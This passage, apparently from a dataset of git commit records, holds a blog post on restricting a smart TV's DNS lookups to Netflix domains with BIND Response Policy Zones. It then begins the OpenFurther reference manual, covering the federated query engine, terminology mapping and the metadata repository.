Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n };\n\nAs can be seen, the zone definitions reference the location of the zone files for each. The files are created as follows, using the RPZ syntax. The first zone, rpz.whitelist, is where to define the domains we want to allow. In my case it looks like this:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterisk on its own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum\n \n IN NS localhost.\n\n* CNAME .\n....\n\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n=== Results\n\nSo does it work? If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nBut if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 
60 IN\tA\t52.208.174.58\n....\n\n=== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL for traffic coming from the TV to only allow TCP on ports 80 and 443. This is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like it uses 8.8.8.8 in addition to any DNS server you give it yourself.)\n\nFinally, on the TV I changed the DNS server, and sure enough the TV thinks something is wrong with DNS:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/4465905\/26027929\/bd59e8b2-380e-11e7-81b1-b8b2b8fd2ffe.JPG[Samsung Error Message]\n\n\nSo far so good, and yes the Netflix app still works fine. Looking closely at my Bind logs I can see what's happening:\n\n....\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 queries: info: client 192.168.240.42#40665 (art-0.nflximg.net): query: art-0.nflximg.net IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 rpz: info: client 192.168.240.42#40665 (art-0.nflximg.net): rpz QNAME PASSTHRU rewrite art-0.nflximg.net via art-0.nflximg.net.rpz.netflix\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 queries: info: client 192.168.240.42#34179 (ns11.whois.co.kr): query: ns11.whois.co.kr IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 rpz: info: client 192.168.240.42#34179 (ns11.whois.co.kr): rpz QNAME NXDOMAIN rewrite ns11.whois.co.kr via ns11.whois.co.kr.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 queries: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 rpz: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 queries: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 rpz: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\n....\n\n\nSo yeah, probably not ideal as the TV can still get out to the internet, at least on 80 and 443 TCP, but without DNS I've hopefully limited how much it can do.\n \n \n \n \n \n \n \n\n \n \n\n\n\n\n\n","old_contents":"= DNS Whitelist in BIND with RPZ\n :hp-tags: DNS, Filtering, Firewall, Security\n\nRestricting DNS queries to a specific list of domains.\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous security and privacy issues with smart TVs of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So being predictably paranoid I immediately blocked the TV's IP address on my router to stop it getting to the internet.\n\nAs it turns out however, the built-in Netflix app on the TV is my only option for 4k Netflix (my HTPC was out due to not having a Kaby Lake chip).\n\nSo I found myself in a situation where I needed to allow the TV get out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit it's access to just Netflix? 
I initially tried an IP-based ACL on the router, but there were some issues with that so I began to wonder: was there a DNS-based approach I could take?\n\n\n=== Enter DNS RPZ\n\nI am relatively familiar with https:\/\/www.isc.org\/downloads\/bind[ISC Bind], having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up, however, I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n=== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with an Ubuntu 16.04 system.\n\nI then configured a 'response-policy' block in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). This lists two RPZ zones which are used to define what queries to filter. The key thing here is that RPZ checks zones in the order they are listed - this is what makes it possible to create a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone \"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authoritative master for these zones, similar to a standard zone, although with \"allow-query\" set to none. Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n allow-transfer { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n allow-transfer { none; };\n };\n\nAs can be seen, the zone definitions reference the location of the zone files for each. The files are created as follows, using the RPZ syntax. The first zone, rpz.whitelist, is where to define the domains we want to allow. In my case it looks like this:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterisk on its own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. 
(\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum\n \n IN NS localhost.\n\n* CNAME .\n....\n\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n=== Results\n\nSo does it work. If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nAnd if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.174.58\n....\n\n=== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL on for traffic coming from the TV to only allow TCP on ports 80 and 443, which is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like the TV uses 8.8.8.8 in addition to any DNS server you give it yourself.)\n\nFinally on the TV I changed the DNS server and sure enough the TV thinks something is wrong with DNS:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/4465905\/26027929\/bd59e8b2-380e-11e7-81b1-b8b2b8fd2ffe.JPG[Samsung Error Message]\n\n\nSo far so good, and yes the Netflix app still works fine. 
Looking closely at my Bind logs I can see what's happening:\n\n....\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 queries: info: client 192.168.240.42#40665 (art-0.nflximg.net): query: art-0.nflximg.net IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 rpz: info: client 192.168.240.42#40665 (art-0.nflximg.net): rpz QNAME PASSTHRU rewrite art-0.nflximg.net via art-0.nflximg.net.rpz.netflix\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 queries: info: client 192.168.240.42#34179 (ns11.whois.co.kr): query: ns11.whois.co.kr IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 rpz: info: client 192.168.240.42#34179 (ns11.whois.co.kr): rpz QNAME NXDOMAIN rewrite ns11.whois.co.kr via ns11.whois.co.kr.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 queries: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 rpz: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 queries: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 rpz: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\n....\n\n\nSo yeah, probably not ideal as the TV can still get out to the internet, at least on 80 and 443 TCP, but without DNS I've hopefully limited how much it can do.\n \n \n \n \n \n \n \n\n \n \n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"eac39115e6f84a9c417f52977567e0ffad175f95","subject":"Update reference-manual.asciidoc","message":"Update reference-manual.asciidoc\n\nAdded description to skipAttr property configuration when FURTHER.observationType does not associate to any attribute at the External Data Source.","repos":"openfurther\/further-open-doc,openfurther\/further-open-doc,openfurther\/further-open-doc","old_file":"reference-manual.asciidoc","new_file":"reference-manual.asciidoc","new_contents":"OpenFurther Reference Documentation\n===================================\n\nAbout\n-----\nThe following documentation applies to *OpenFurther version 1.4.0-SNAPSHOT*\n\nConventions\n~~~~~~~~~~~\n\nNOTE: A note\n\nIMPORTANT: An important point\n\nTIP: A tip\n\nWARNING: A warning\n\nCAUTION: A point of caution\n\nIntroduction\n------------\nOpenFurther is an informatics platform that supports federation and integration of data from heterogeneous and disparate data sources.\n\nIt has been deployed at the University of Utah (UU) as the Federated Utah Research and Translational Health e-Repository (FURTHeR) since August 2011 and is available for use by all U of U employees and students. OpenFurther links heterogeneous data types, including clinical, public health, biospecimen and patient-generated data; empowering researchers with the ability to assess feasibility of particular clinical research studies, export biomedical datasets for analysis, and create aggregate databases for comparative effectiveness research. 
With the ability to link unique individuals from these sources, OpenFurther is able to identify cohorts for clinical research.\n\nIt provides semantic and syntactic interoperability as it federates health information on-the-fly and in real-time and requires neither data extraction nor homogenization by data source partners, facilitating integration by retaining data in their native format and in their originating systems.\n\nOpenFurther is built upon Maven, Spring, Hibernate, ServiceMix, and other open source frameworks that promote OpenFurther's code reusability and interoperability.\n\n\nArchitecture\n------------\nLoosely, OpenFurther runs as a multi-tier application. The presentation layer or front end\/user-interface is served (currently) through the i2b2 web client. The logic layer is served through the ServiceMix ESB, and the database layer is served using Oracle 11g, although it can be configured for other databases as well.\n\nUser Interface\n~~~~~~~~~~~~~~\nOpenFurther utilizes the i2b2 web client as a front-end for querying data. The user interface has been modified to support federated querying.\n\n.Customized i2b2 User Interface\nimage::images\/figures\/i2b2_ui_query_results.png[]\n\nHooking OpenFurther into i2b2\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes a Java Servlet Filter to divert query requests to the OpenFurther backend system. The Servlet filter looks for XML messages from i2b2 that indicate a query is being run. Those XML messages are then diverted to OpenFurther, which converts them into OpenFurther queries and runs them. All other XML messages are ignored and i2b2 is allowed to run as normal. \n\nNOTE: *No data is stored within i2b2, all data resides within its original location*\n\nThe Federated Query Engine (FQE)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nIn OpenFurther, the term \"FQE\" (Federated Query Engine) broadly refers to the set of software modules involved in the execution of a federated query.\n\n.Federated Query Engine\nimage::images\/figures\/fqe.png[]\n\n* A federated query written in FQL (an XML based query language) or an i2b2 query is submitted at *1*.\n* Utilizing the publish-subscribe pattern, one or more data source adapters are subscribed to the Query Topic at *2*. \n* If the query is an i2b2 query, the FQE converts the i2b2 query to a federated query. \n* The FQE then posts the query to the Query Topic (*2*) and each listening data source adapter receives a copy of the query.\n* Each data source adapter runs through a number of steps to initialize, process, and translate a query for a given data source (explained below). \n* Throughout the processing, status messages are sent to a Status Queue at *3*. \n* Once results are translated to a common model, they are persisted to the In-Memory database and the result count is sent to *4*.\n\nData Source Adapters\n~~~~~~~~~~~~~~~~~~~~\nData source adapters are facades around an existing data source. Data source adapters can be entirely custom for any given implementation or they can use a pre-written adapter if their data source is already in a well-known format such as OMOP, i2b2, OpenMRS, etc.\n\nData source adapter configuration should follow the configuration steps outlined in reference-manual-datasources link:reference-manual-datasources.pdf[pdf], link:reference-manual-datasources.asciidoc[asciidoc] \n\n.Data Source Adapters\nimage::images\/figures\/data_source_adapters.png[]\n\n* Data source adapters follow the chain-of-responsibility pattern. 
The process of adapting a query is broken down into several small steps and each output is passed on to the next step. Data source adapters typically have 4 common steps. \n\n1. They are given an initialization step which allows them to determine whether or not the given data source can answer the given query. It also provides for any other initialization required throughout the process. \n2. Query translation translates the logical FQL that is not specific to any data source into data source-specific language. This will vary with data sources. Some data sources will utilize SQL, others might use a web service. It utilizes the Metadata Repository (MDR) for translating attributes and values (e.g. logical query uses Gender but actual data source uses Sex as the attribute). It also utilizes DTS (Terminology Server) to translate from a given code (e.g. ICD9 250) to the data source\u2019s code (e.g. 12345). \n3. The query is executed against the data source and results are returned in their native format (SQL ResultSet, XML, etc.). \n4. Result translation translates the results into a common model with standardized vocabulary\/terminology utilizing the Metadata Repository (MDR) and DTS (Terminology Server).\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes Apelon's Distributed Terminology System version 3.5.2.203 (aka DTS) for terminology-related functionality. The OpenFurther instance of DTS contains concepts from the standard terminologies SNOMED-CT, ICD-9, RxNorm, and UCUM. There are also non-standard terminologies (aka Local) for each of the data sources as well as associated mappings. The use of standard terminologies and mappings makes it possible for the software to resolve differences between concepts in various data sources and achieve a degree of semantic interoperability. Use of Apelon DTS assumes agreement to the Apache Version 2 standard open source license agreement http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html. For more information about Apelon DTS, please see their website http:\/\/www.apelon.com.\n\nFeatures of Apelon DTS\n^^^^^^^^^^^^^^^^^^^^^^\nThe Apelon DTS (Distributed Terminology System) is an integrated set of open source components that provides comprehensive terminology services in distributed application environments.\n\nDTS supports national and international data standards, which are a necessary foundation for comparable and interoperable health information, as well as local vocabularies.\n\nDTS consists of:\n\n* DTS Core - the core system, database, API, etc.\n* DTS Editor - a GUI interface for viewing, adding, and editing concepts\n* DTS Browser - a web interface for viewing concepts\n* Modular Classifier - allows for extending standard ontologies\n\nTerminology\n-----------\n\nGetting Started\n~~~~~~~~~~~~~~~\nIn order to utilize the OpenFurther software, it is necessary to have terminology mappings from your desired data sources to standard terminologies. These standard codes are then translated via the software, terminology server, and associated mappings so that they resolve to a local data source's codes\/terms.\n\nIMPORTANT: It is important to note that the content distributed with OpenFurther is for demonstration purposes only. The standard terminologies have been provided with permission via Apelon's distribution of free subscription content available on their open source website link:http:\/\/apelon-dts.sourceforge.net\/[]. 
This standard content is several years out of date and would not be the most suitable for a real world instance. \n\nTIP: It is recommended for organizations that desire to use the OpenFurther software to consider resourcing a dedicated terminologist or someone that has experience with controlled vocabularies and ontologies to work on managing\/mapping local vocabularies\/codes to their specific implementation of OpenFurther.\n\nApelon provides a content delivery subscription service at a reasonable cost. Standard terminologies can also be downloaded from the U.S. National Library of Medicine Unified Medical Language System (link: http:\/\/www.nlm.nih.gov\/research\/umls\/[UMLS]) after meeting and accepting their requirements and license agreements. \n\nNOTE: The local vocabularies have been mapped to the best possible matches to the available standard terminologies. However, in some cases such as OpenMRS, local concepts had to be created to fit the OpenFurther demonstration scenario. Any creation of local concepts was done in best accordance of the specifications provided by the source. \n\nOpenFurther's i2b2 front end user interface contains an ontology based off of the recommendations of the Healthcare Information Technology Standards Panel (HITSP). For instance, HITSP recommends the use of ICD-9 codes for diagnosis and LOINC for laboratory data. Please note that because of licensing agreements, not all of the HITSP recommendations could be followed for OpenFurther. For example, HITSP recommends the use of CPT for procedures. In OpenFurther, procedures will be based off the SNOMED CT hierarchy for procedures.\n\nWhy are mappings needed?\n^^^^^^^^^^^^^^^^^^^^^^^\nMappings are needed because of the variations in terminology used between disparate data sources. Mappings equate concepts that are intended to mean the same thing. \n\nTIP: Mapping can be a very human labor intensive task. Mappings must be verified and tested to ensure quality of results. Involving subject matter experts and collaborating effectively across datasources will be paramount to achieving a successful implementation of terminology.\n\n.Mapping Terminology\nimage::images\/figures\/mapping_terminology.png[]\n\nInitial Steps\n^^^^^^^^^^^^^\nApelon DTS provides excellent documentation and examples of how to use their terminology server software. All Apelon documentation can be found at: http:\/\/apelon-dts.sourceforge.net\/documents.html\n\nIMPORTANT: It is highly recommended that you familiarize yourself with the basic use of the Apelon DTS software. The instance included in OpenFurther can serve as an example of how the OpenFurther team has used Apelon DTS but the best instruction on how to use Apelon DTS is provided directly from Apelon. 
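\n\nAs a concrete, hedged sketch of what a completed mapping enables: the DTS REST service deployed alongside OpenFurther can be asked to translate a concept code from one namespace to another. The call below simply reuses the example translate URL shown in Part Three of the MDR section of this manual; the host name, the namespace identifiers (30 = SNOMED CT, 32776 = a local namespace), and the concept code 439401001 are taken from that example and will differ in your installation:\n\n....\ncurl \"http:\/\/dev-esb.further.utah.edu:9000\/dts\/rest\/translate\/30\/Code%20in%20Source\/439401001\/32776\/Domain?view=HUMAN\"\n....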
\n\nLocal Namespaces\n++++++++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#62[62] of the Apelon DTS Editor documentation.\n\nAuthorities\n+++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#72[72] of the Apelon DTS Editor documentation.\n\nAssociation Types\n+++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#75[75-77] of the Apelon DTS Editor documentation.\n\nAssociation Qualifier Types\n+++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#80[80-84] of the Apelon DTS Editor documentation.\n\nProperty Types\n++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#94[94-96] of the Apelon DTS Editor documentation.\n\nProperty Qualifier Types\n++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#99[99-101] of the Apelon DTS Editor documentation.\n\nAdding new concepts\/terms, assign properties, associations\/mappings\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#119[119-141] of the Apelon DTS Editor documentation.\n\nBulk loading and working with spreadsheets\n++++++++++++++++++++++++++++++++++++++++++\n\nRefer to the import wizard plugin http:\/\/sourceforge.net\/apps\/trac\/apelon-dts\/raw-attachment\/wiki\/MiscWikiFiles\/importwizarduserguide-3.0.pdf[user guide]\n\n\nThe Metadata Repository (MDR)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nThe MDR is responsible for storing information (artifacts) about various data sources. This includes things like data models, attributes, attribute types, etc. It is accessed using web services.\n\n* Home-grown but follows standards\n** XMI, Dublin Core\n** HL7 datatypes, CDA, DDI\n* Stores artifacts\n** Logical models (UML), local models (UML), model mappings\n** Administrative information\n** Descriptive information\n* Models supported\n** OMOP, i2b2, local models\n\nMetadata Repository (MDR)\n-------------------------\n\nGetting Started\n~~~~~~~~~~~~~~~\nTwo important functions supported by the metadata repository are Query Translation and Result Translation. Data stored within the MDR is used to drive each of these processes.\n\n.Translating Metadata\nimage::images\/figures\/translating_metadata.png[]\n\nQuery Translation\n^^^^^^^^^^^^^^^^^\nThe objective of a query translation is to convert the OpenFurther Query Language (FQL) query (OpenFurther's classes, attributes, and attribute values) into the target physical data source's data classes, attributes, and attribute values while maintaining the integrity of the query logic. If the attributes being queried do not exist in the external target data source, no data will be returned from the particular source. Therefore, the end user must carefully select the attributes to ensure that they exist in the target of interest.\n\n.Query Translation\nimage::images\/figures\/query_translation.png[]\n\nThe user interface, currently i2b2, is responsible for building a query. When a query is submitted to the FQE, the FQE converts i2b2's query into FQL, an XML representation of the query (see the FQL XML Schema) that consists of logical expressions using OpenFurther's data model classes and attributes. 
Class and class attribute names used in FQL are based on OpenFurther classes and attributes and can be found in OpenFurther's Java code located here: https:\/\/github.com\/openfurther\/further-open-core\/tree\/master\/ds\/ds-further\/src\/main\/java\/edu\/utah\/further\/ds\/further\/model\/impl\/domain\n\nCoded class attribute value domains within the OpenFurther model are all based on standard terminology where demographics are SNOMED CT codes, diagnoses are ICD-9 codes, and labs are LOINC codes. All attributes that have coded value sets also have an associated attribute that ends with the term 'NamespaceId' (namespaces are also called coding systems). This NamespaceId attribute is used to signify what coding system a particular attribute will use. For instance, raceCode=413773004 and raceCodeNamespaceId=30 would signify the SNOMED CT code for the Caucasian race.\n\nBy default, Apelon DTS reserves certain identifiers for use with standard terminologies.\n\n.Apelon DTS Namespace Identifiers\n[width=\"40%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Namespace |Identifier\n|SNOMED CT |30\n|ICD-9 |10\n|LOINC |5102\n|RxNorm |1552\n|======================\n\nExample input and output\n++++++++++++++++++++++++\n\n.Example query translation input\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceNamespaceId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:long\">30<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">race<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\t413773004\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nGiven the above input, query translation would generate the following output:\n\n.Example query translation output\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceConceptId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:decimal\">\n\t\t\t\t\t4185154\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nResult Translation\n^^^^^^^^^^^^^^^^^^\nEach data source queried by OpenFurther will respond with a result set in its platform\/database-specific format, which needs to be converted into OpenFurther's data model for final analysis and reconciliation of the returned data from each data source, i.e. all the pears, oranges, and pineapples need to be converted to the same kind of apples. 
